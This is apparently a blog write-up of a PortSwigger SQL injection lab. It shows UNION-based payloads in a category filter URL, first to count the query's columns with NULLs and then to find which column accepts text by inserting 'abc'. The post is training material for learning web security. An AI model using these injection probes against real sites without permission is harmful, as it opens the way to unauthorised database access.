🕸️ PSA - SQLi 4 - Finding column containing text

Posted Mar 3, 2023 Updated Sep 28, 2024

By blueh0rse

1 min read

Difficulty : Practitioner

🎯 Goal

To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided.

Value provided: ‘abc’

✅ Solution

First we need to know how many columns are returned by the query:

<website>/filter?category=Pets' UNION SELECT NULL--    # error!
<website>/filter?category=Pets' UNION SELECT NULL,NULL--    # error!
<website>/filter?category=Pets' UNION SELECT NULL,NULL,NULL--    # works
<website>/filter?category=Pets' UNION SELECT NULL,NULL,NULL,NULL--    # error!

We now know there are 3 columns. Time to find which one contains string data:

<website>/filter?category=Pets' UNION SELECT 'abc',NULL,NULL--    # error!
<website>/filter?category=Pets' UNION SELECT NULL,'abc',NULL--    # works
<website>/filter?category=Pets' UNION SELECT NULL,NULL,'abc'--    # error!

The second column contains string.

PortSwigger, SQLi

This post is licensed under GNU GPLv3 by the author.

🕸️ PSA - SQLi 4 - Finding column containing text

🎯 Goal

✅ Solution

Further Reading

🕸️ PSA - SQLi 1 - SQLi in WHERE clause

🕸️ PSA - SQLi 2 - SQLi Allowing Authentication Bypass

🕸️ PSA - SQLi 3 - UNION attack, determining the number of columns returned by the query